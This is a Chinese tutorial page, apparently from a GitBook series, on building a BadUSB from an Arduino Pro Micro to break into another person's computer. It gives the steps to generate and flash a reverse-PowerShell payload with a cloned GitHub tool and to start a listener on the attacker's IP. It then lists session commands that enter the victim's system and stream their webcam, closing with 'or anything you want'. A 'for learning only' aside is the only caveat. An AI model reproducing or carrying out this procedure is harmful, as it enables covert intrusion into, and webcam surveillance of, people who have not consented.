怎样实现的?
  • 怎样实现的?
  • 简介
  • 怎样实现的?
    • 用Mastodon搭建自己的Twitter
    • 用Cumulusclips搭建自己的YouTube
    • 用bookStack搭建团队知识平台
    • 用Duplicati实现计划备份
    • 用FreeNAS搭建网络存储服务器
    • Ovirt4.2搭建流程
    • 使用Rancher光速搭建K8s集群
    • CentOS7不重启扩展根分区磁盘空间
    • 搭建团队文档协作平台(OnlyOffice)
    • 使用TF-Hub进行迁移学习(图像分类)
    • 用EVE-NG做仿真网络实验
    • 用docsite生成企业站点
    • 使用Harbor搭建自己的docker镜像仓库
    • 使用OpenSTF同时操作多台手机
    • 使用LDX创建管理基于容器的虚拟机
    • 调整Linux内核参数
    • ProxmoxVE高可用集群搭建并集成Ceph
    • Ceph集群的搭建与运维
    • Nextcloud搭建自己的云盘
    • Centos7搭建单节点OpenShift(OKD)
    • 使用Fuel快速搭建OpenStack
    • CentOS7搭建DNS服务器
    • 微信的语音段传输
    • 用Python写MT4自动交易策略来炒外汇
    • WebAR
    • 用BadUSB物理入侵别人的电脑
    • 用Tensorflow.js和摄像头玩俄罗斯方块
    • 开发以太坊DAPP--水果机
    • 表达式是怎样被解析的呢
    • Airtest基于图像识别的UI自动化测试工具
    • 滑动拼图验证码的JS实现
    • 内网穿透--TCP打洞
    • 一致性哈希算法的理解与实践
Powered by GitBook
On this page
  • 原理
  • 制作BadUSB
  • 将恶意代码烧录进BadUSB
  • 进行攻击。。。
  • Github地址
  1. 怎样实现的?

用BadUSB物理入侵别人的电脑

PreviousWebARNext用Tensorflow.js和摄像头玩俄罗斯方块

Last updated 6 years ago

原理

  • 把恶意代码烧录进BadUSB的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。

  • 把带有恶意代码的BadUSB插入目标电脑中,生成反向Shell会话

  • 远程电脑登陆Shell进行各种操作,比如操纵摄像头等...(仅供学习,不要干坏事哦)

制作BadUSB

  1. 买一块迷你型的Arduino开发板: Arduino Pro Micro(Atmega32U4)

  2. 买一个microUSB的转接头

  3. 自制一个好看的外壳...

将恶意代码烧录进BadUSB

  • 打开Kail Linux,作为攻击方电脑

  • git clone

  • cd Arduino-Reverse-Shell-Generator

  • sudo ruby reverse_powershell_arduino.rb

  • 输入攻击方的机器ip和自定义端口,一路回车,最终生成Arduino烧录用的脚本并自动启动反向Shell监听

  • 用ArduinoIDE烧录恶意代码

进行攻击。。。

  • 将BadUSB插入目标电脑,有杀毒软件是不行的 😀

  • 回到刚刚烧录代码的Kail Linux机器,应该可以看到已经连接上目标电脑了

  • 输入 sessions -i 1 进入目标电脑系统

  • 输入 webcam_list 扫描可用的摄像头

  • 输入 webcam_stream 1 打开目标摄像头...

  • or anything you want...

Github地址

https://github.com/christofersimbar/Arduino-Reverse-Shell-Generator.git
https://github.com/christofersimbar/Arduino-Reverse-Shell-Generator